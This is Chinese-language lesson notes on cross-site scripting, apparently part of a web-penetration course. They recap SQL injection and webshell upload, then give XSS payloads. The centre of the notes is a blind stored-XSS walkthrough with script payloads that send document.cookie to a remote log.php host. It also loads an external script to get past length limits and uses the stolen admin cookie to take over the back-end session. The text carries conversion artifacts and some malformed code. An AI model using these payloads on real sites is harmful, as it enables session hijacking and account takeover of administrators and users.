上一節課,咱們經過SQL注入獲取目標數據庫中的數據,再經過獲取賬戶密碼,進行爆破、後臺路徑成功地登陸進入後臺,再經過後臺的文件上傳漏洞,成功地獲取網站的webshell,也就是獲取了目標網站的權限。php
今天咱們講XSSweb
XSS利用方式 攻擊客戶端 竊取用戶信息 管理員shell
普通用戶數據庫
SQL注入利用數據 提權 寫文件提權cookie
XSS經常使用的幾個payloaddom
<img/src=x>xss
<svg/onload=alert(1)>svg
<script>alert(1)<script>測試
第一種加載圖片,後兩種彈窗網站
<!-- 註釋的方式,容易形成頁面混亂
好比像測試的一個網站,有個用戶註冊,咱們經過修改信息達到彈窗的目的。而管理員只有在後臺點開會員信息時,纔會彈窗
這就是XSS盲打,因此說失敗率仍是挺高的,可是事情咱們仍是要去作
當我把咱們的cookie改爲管理員的cookie時,就至關於咱們有管理員的權限了。
可使用Editthiscookie
payload:new image().src ="http://domain.com/log.php?c=" + encodeURL(document.cookie);
JS的一個語法
document.cookie的內容以下
此時咱們加上標籤 <script>new image().src ="http:/txt.me/log.php?c=" + encodeURL(document.cookie);</script>
http:/txt.me/log.php?c=
咱們這個域名下有個log.php的目錄,後面有個參數c,假如咱們隨便輸入一段內容,c=23333
那麼這段內容會被存儲到cookie.txt中
當咱們插入xss的payload時,發現有字符串限制時怎麼辦呢
利用src 外部的Js腳本屬性 <script src=//txt.me/1.js></script>
1.js就是咱們上面字符串的內容
插入後,咱們能夠查看一下有沒有成功
咱們剛纔進入了兩次,成功記錄了2次
咱們能夠對比一下是否是咱們的cookie 查看Headers
當管理員在後臺點擊會員管理時,就會觸發
而後咱們得到管理員cookie後,開始替換
成功替換,刷新一下頁面,此時咱們就是管理員頁面了
end
XSS平臺的使用
未完待續